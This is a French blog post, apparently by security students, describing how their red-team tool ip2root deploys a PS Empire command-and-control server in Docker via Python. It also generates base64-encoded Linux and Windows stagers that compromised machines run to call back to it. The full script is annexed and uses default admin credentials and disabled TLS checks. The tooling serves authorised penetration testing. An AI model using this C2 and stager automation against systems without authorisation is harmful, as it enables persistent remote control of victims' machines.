Contents

🛠️ IP2ROOT Partie 1 : Déploiement automatisé d'un C2 via Python et Docker SDK

Introduction

Durant cette série de trois articles nous mettrons en lumière différentes briques techniques de notre projet, ip2root.

Contexte

ip2root est un projet que nous menons au cours de notre 5ème annĂ©e du cycle IngĂ©nieur CyberdĂ©fense Ă  l’ENSIBS. Les objectifs du projet sont les suivants :

  • fournir aux Ă©quipes de pentest ou Red Team, un outil clĂ© en main permettant d’exploiter automatiquement des vulnĂ©rabilitĂ©s communes afin de gagner du temps
  • A partir d’une adresse rĂ©seau ou une plage rĂ©seau fournie en entrĂ©e, l’outil retourne :
    • un accès en ligne de commande (privilĂ©giĂ© si l’escalade de privilège a fonctionnĂ©) aux machines compromises
    • un rapport d’exploitation, le tout sans aucune interaction de l’utilisateur

Le projet est open-source et disponible sur Github : https://github.com/ip2root/ip2root

Organisation

Les trois articles de cette série aborderont les thématiques suivantes :

  1. DĂ©ploiement automatisĂ© d’un C2 (Serveur de commande et de contrĂ´le) via Python et Docker SDK
  2. Reconnaissance des services grâce aux outils Nmap ainsi que Masscan et corrélation avec les exploits implémentés pour obtenir un accès intial
  3. EnumĂ©rer les possibilitĂ©s d’Ă©lĂ©vation de privilèges sous Linux et Windows avec Python

Command and Control (C2)

Glossaire

C2 : Une infrastructure Commande et ContrĂ´le, aussi appelĂ©e C2 ou C&C, est l’infrastructure utilisĂ©e par les attaquants pour maintenir la communication avec des appareils compromis, Ă  la suite d’une première exploitation. (A noter que nous ne souhaitons pas aider les attaquants mais nous avons besoin de nous placer du cĂ´tĂ© offensif afin de dĂ©celer les failles d’un SI donnĂ©)

Stager : Une charge utile à executer sur la machine compromise afin que cette dernière puisse recevoir et exécuter les commandes du C2.

Listener : Outil permettant de recevoir des connexions sur un port donné.


Entrons dans le vif du sujet, comment avons-nous choisi notre C2 ? Comment avons-nous automatisé son déploiement ?

Besoins et objectifs du C2

L’outil Ă©tait initialement prĂ©vu pour gĂ©rer une seule adresse rĂ©seau et donc un seul accès en ligne de commande. Nous sommes alors partis sur un simple listener. Nous avons rapidement observĂ© les limites de cette mĂ©thode :

  • complexitĂ© d’envoi de fichiers
  • complexitĂ© de gestion de plusieurs accès
  • sujets Ă  des bugs (mineurs)

En plus de ces problèmes, nous avons dĂ©cidĂ© de permettre Ă  l’utilisateur de fournir une plage rĂ©seau en entrĂ©e. Il nous faut donc pouvoir gĂ©rer plusieurs accès en ligne de commande et ceci n’est pas possible avec un simple listener. Pour ce faire, nous avons dĂ©cidĂ© de dĂ©ployer un C2 permettant de gĂ©rer tous nos accès en ligne de commande.

Le C2 doit rĂ©pondre Ă  ces besoins afin qu’il corresponde au projet :

  • API exposĂ©e -> interagir facilement via notre outil
  • Stagers compatibles linux et windows -> garder l’exhaustivitĂ© de notre outil
  • DĂ©ployable via Docker -> simplifier l’utilisation de l’outil
  • Intuitif -> tous les utilisateurs de l’outil ne sont pas forcĂ©ment familiers avec les C2

Après avoir épluché les différentes offres présentes sur le marché, nous avons (notamment) le choix entre Covenant et PS Empire.

Nous choisissons PS Empire car nous avons une (petite) expérience sur ce dernier.

Automatisation du déploiement

Il est maintenant l’heure de mettre les mains dans le cambouis.

La première Ă©tape est de vĂ©rifier si l’utilisateur ne possède pas dĂ©jĂ  un C2 de dĂ©ployĂ© sur sa machine (dans le cas ou notre outil a dĂ©jĂ  Ă©tĂ© utilisĂ© par ce dernier).

Nous commençons par importer la librairie docker avec pip3 install docker et import docker dans notre code.

Dans notre code, nous pouvons désormais initialiser le client Docker :

1
client = docker.from_env()

On itère dans la liste de ceux présents afin de chercher si un conteneur empire existe déjà :

1
2
3
4
5
6
for i in range(len(client.containers.list(all))):
        container = client.containers.get(client.containers.list(all)[i].__getattribute__('short_id'))
        if "empire" in container.attrs['Config']['Image']:
            print('[+] Detected an existing C2 container')
            is_up = True
            client.containers.list(all)[i].start()

Et on le dĂ©marre s’il existe : start().

Si aucun conteneur Empire n’existe, nous appelons la fonction permettant d’en dĂ©ployer un de zĂ©ro :

1
infos = deploy_c2()

On crée et démarre le conteneur avec les paramètres souhaités :

  • Image : bcsecurity/empire:latest
  • Ports : 1337:1337, 5000:5000 et 8888:8888
  • Nom : empire
  • Interactif : oui
  • DĂ©tachĂ© : oui

Ce qui nous donne en Python avec Docker SDK :

1
container = client.containers.run(image='bcsecurity/empire:latest', ports={'1337/tcp':1337, '5000/tcp':5000, '8888/tcp':8888}, name='empire', tty=True, detach=True)

Une fois que nous avons un conteneur dĂ©ployĂ©, que ce soit parce qu’il l’Ă©tait dĂ©jĂ  ou après l’avoir créé, il nous faut rĂ©cupĂ©rer le token permettant d’interagir avec l’API REST.

Nous appelons la fonction permettant de récupérer le token de la sorte :

1
 token = c2_token()

Dans la fonction associĂ©e, nous commençons par dĂ©finir l’endpoint de l’API Ă  joindre ainsi que les en-tĂŞtes de requĂŞte et paramètres Ă  fournir :

1
2
3
4
5
def c2_token():
    url_c2 = 'https://localhost:1337/api/admin/login'
    headers = {"Content-Type": "application/json"}
    param = {"username":"empireadmin", "password":"password123"}
    r_c2 = requests.post(url_c2, headers=headers, json=param, verify=False)

Puis, nous récupérons le token dans la réponse de la requête POST :

1
2
3
json_token = json.loads(r_c2.text)
token = json_token['token']
return token

Maintenant que nous avons rĂ©cupĂ©rĂ© le token, nous pouvons communiquer plus en dĂ©tail avec l’API du C2.

Afin que le C2 soit opérationnel il nous reste deux tâches à effectuer :

  • CrĂ©er un listener (permet de rĂ©cupĂ©rer l’accès dĂ©clenchĂ© par l’exploitation d’une vulnĂ©rabilitĂ©)
  • CrĂ©er une fonction permettant de gĂ©nĂ©rer un stager adaptĂ© (charge utile permettant de joindre le serveur de contrĂ´le via le listener)

Pour la première tâche, comme prĂ©cĂ©demment, nous spĂ©cifions l’endpoint de l’API Ă  joindre avec les paramètres requis pour la crĂ©ation d’un listener (nom et port et adresse rĂ©seau) :

1
2
3
4
 url_listener = 'https://localhost:1337/api/listeners/http?token={0}'.format(str(token))
param_listener = {"Name":"CLIHTTP", "Port":"8888", "Host":"{0}".format(LOCAL_IP)}
headers = {"Content-Type": "application/json"}
requests.post(url_listener, headers=headers, json=param_listener, verify=False)

Ici, notre listener se nommera CLIHTTP et sera disponible sur le port 8888.

Pour la fonction permettant de générer les stagers, nous définissons les mêmes prérequis pour effectuer la requête sur notre C2 :

1
2
3
4
url_stager = 'https://localhost:1337/api/stagers?token={0}'.format(token)
param_stager = {"StagerName":"{0}".format(system), "Listener":"CLIHTTP"}
headers_stager = {"Content-Type": "application/json"}
r_stager = requests.post(url_stager, headers=headers_stager, json=param_stager, verify=False)

Le nom du stager choisi ("StagerName":"{0}".format(system)) est défini par le paramètre OS entré dans le fichier de configuration de la vulnérabilité exploitée : soit multi/bash pour un Linux, soit multi/launcher pour un Windows. On associe le stager à notre listener : CLIHTTP.

On rĂ©cupère le payload et on l’encode en base64 afin de faciliter l’envoi du payload (retour Ă  la ligne, caractères spĂ©ciaux, etc.) :

1
2
3
4
5
payload = json.loads(r_stager.text)
payload = payload[system]['Output']
message_bytes = payload.encode('ascii')
rs_b64 = base64.b64encode(message_bytes)
return rs_b64

Une fois tout ceci fait, nous avons finalisĂ© le dĂ©ploiement automatique et transparent du C2 pour l’utilisateur.

Client

Pour administrer le C2 et commander les machines infectées qui sont inscrites dessus, il faut un client.

Nous utiliserons Starkiller. Toujours dans l’optique de faciliter la vie de l’utilisateur, nous vĂ©rifions s’il existe dĂ©jĂ  dans le rĂ©pertoire /tmp de notre utilisateur, sinon, nous le tĂ©lĂ©chargeons depuis github:

1
2
3
4
5
6
 STARKILLER_PATH = '/tmp/starkiller'
if not os.path.exists(STARKILLER_PATH):
    STARKILLER_URL = 'https://github.com/BC-SECURITY/Starkiller/releases/download/v1.10.0/starkiller-1.10.0.AppImage'
    print('[+] Downloading starkiller in {} from {}'.format(STARKILLER_PATH, STARKILLER_URL))
    r_github = requests.get(STARKILLER_URL, allow_redirects=True)
    open(STARKILLER_PATH, 'wb').write(r_github.content)

Une fois qu’il est tĂ©lĂ©chargĂ©, nous appliquons les droits d’exĂ©cution sur le binaire puis nous le dĂ©marrons.

1
2
subprocess.Popen(["chmod", "+x", STARKILLER_PATH])
subprocess.Popen([STARKILLER_PATH])

L’utilisateur n’a alors plus qu’Ă  entrer ses identifiants pour administrer le C2 : https://md.floppy.sh/uploads/1ca17bc5-4576-42a2-b1d2-c13514009c53.png


Conclusion

Pour conclure, nous avons pu mettre en oeuvre l’automatisation du dĂ©ploiement d’un C2 pour notre projet Ă  l’aide de Python, Docker SDK et de PS Empire. Cela permet de faciliter la vie de l’utilisateur et de lui faire gagner du temps lors d’audits de sĂ©curitĂ©.

Le code complet est disponible sur le Github du projet Ă  l’adresse suivante : https://github.com/ip2root/ip2root/blob/dev/c2/c2.py

A noter que l’implĂ©mentation du C2 est encore en dĂ©veloppement et l’outil n’est pas encore complètement compatible avec. La version fonctionnelle de notre outil (sans le C2 pour l’instant) est disponible ici : https://github.com/ip2root/ip2root Le prochain article traitera de la partie Reconnaissance des services grâce aux outils Nmap et Masscan et corrĂ©lation avec les exploits implĂ©mentĂ©s pour obtenir un accès intial avec les fichiers de configuration Python

Annexe

Code complet

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
import docker
import os
import subprocess
import requests
import json
import base64
from time import sleep
import urllib3
import sys
import more_itertools
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def c2(LOCAL_IP) -> None | str:
    check_docker()
    is_up = False
    client = docker.from_env()

    for i in range(len(client.containers.list(all))):
        container = client.containers.get(client.containers.list(all)[i].__getattribute__('short_id'))
        if "empire" in container.attrs['Config']['Image']:
            print('[+] Detected an existing C2 container')
            is_up = True
            client.containers.list(all)[i].start()
            for c in more_itertools.ncycles(['|', '/', '-', '\\'], 100):
                logs = '   ' + str(container.logs(tail=1).decode('utf-8'))
                sys.stdout.write('\033[2K\r[+] Starting the Docker... ' + c)
                if "WARNING: your terminal doesn't support" not in logs:
                    sys.stdout.write((logs.replace('\r', '')).replace('\n', ''))
                sys.stdout.flush()
                sleep(0.1)
                if 'Plugin csharpserver ran successfully!' in container.logs(tail=3).decode('utf-8'):
                    print('\n[+] C2 started successfully from existing docker (ID: {0})'.format(client.containers.list(all)[i].short_id))
                    break
            token = c2_token()
            print('[+] C2 token : {0}'.format(token))
            print('[+] Listening on port 8888 (CLIHTTP)')
            return client.containers.list(all)[i].short_id, token
    if not is_up:
        infos = deploy_c2(LOCAL_IP)
        return infos

def check_docker():
    res_docker = subprocess.check_output('which docker', shell=True, universal_newlines=True)
    if 'docker' not in res_docker:
        print('[-] Docker is not installed on your system. Please intall it from https://docs.docker.com')
        exit
    res_group = subprocess.check_output('id -nG "$(whoami)" | grep -qw "docker" && echo 1 || echo 0 && id -nG "$(whoami)" | grep -qw "root" && echo 1 || echo 0', shell=True, universal_newlines=True)
    if '1' not in res_group:
        print('[-] Your current user is not part of the docker group. Add it or start ip2root with a user that is part of the docker group.')
        exit

def starkiller():
    STARKILLER_PATH = '/tmp/starkiller'
    if not os.path.exists(STARKILLER_PATH):
        STARKILLER_URL = 'https://github.com/BC-SECURITY/Starkiller/releases/download/v1.10.0/starkiller-1.10.0.AppImage'
        print('[+] Downloading starkiller in {} from {}'.format(STARKILLER_PATH, STARKILLER_URL))
        r_github = requests.get(STARKILLER_URL, allow_redirects=True)
        open(STARKILLER_PATH, 'wb').write(r_github.content)
    subprocess.Popen(["chmod", "+x", STARKILLER_PATH])
    subprocess.Popen([STARKILLER_PATH])

def deploy_c2(LOCAL_IP):
    print('[+] Deploying C2 container')
    C2_LISTENER_PORT = 8888
    client = docker.from_env()
    container = client.containers.run(image='bcsecurity/empire:latest', ports={'1337/tcp':1337, '5000/tcp':5000, '{}/tcp'.format(C2_LISTENER_PORT):C2_LISTENER_PORT}, name='empire', tty=True, detach=True)
    for c in more_itertools.ncycles(['|', '/', '-', '\\'], 100):
        logs = '   ' + str(container.logs(tail=1).decode('utf-8'))
        sys.stdout.write('\033[2K\r[+] Starting the Docker... ' + c)
        sys.stdout.write((logs.replace('\r', '').replace('\n', '')))
        sys.stdout.flush()
        sleep(0.1)
        if 'Plugin csharpserver ran successfully!' in logs:
            print('\n[+] C2 created successfully')
            break
    token = c2_token()
    c2_listener(token, LOCAL_IP)
    print('[+] C2 container created successfully (Docker ID : {0})'.format(container.short_id))
    print('[+] Listener created on port {} (CLIHTTP)'.format(C2_LISTENER_PORT))
    return container.short_id, token

def c2_token():
    url_c2 = 'https://localhost:1337/api/admin/login'
    headers = {"Content-Type": "application/json"}
    param = {"username":"empireadmin", "password":"password123"}
    r_c2 = requests.post(url_c2, headers=headers, json=param, verify=False)
    json_token = json.loads(r_c2.text)
    token = json_token['token']
    return token

def c2_listener(token, LOCAL_IP):
    url_listener = 'https://localhost:1337/api/listeners/http?token={0}'.format(str(token))
    param_listener = {"Name":"CLIHTTP", "Port":"8888", "Host":"{0}".format(LOCAL_IP)}
    headers = {"Content-Type": "application/json"}
    requests.post(url_listener, headers=headers, json=param_listener, verify=False)

def get_stager(system, token):
    if system == 'linux':
        system = 'multi/bash'
    elif system == 'windows':
        system = 'multi/launcher'
    else:
        return "Error: OS not defined."

    url_stager = 'https://localhost:1337/api/stagers?token={0}'.format(token)
    param_stager = {"StagerName":"{0}".format(system), "Listener":"CLIHTTP"}
    headers_stager = {"Content-Type": "application/json"}
    r_stager = requests.post(url_stager, headers=headers_stager, json=param_stager, verify=False)
    payload = json.loads(r_stager.text)
    payload = payload[system]['Output']
    message_bytes = payload.encode('ascii')
    rs_b64 = base64.b64encode(message_bytes)

    return rs_b64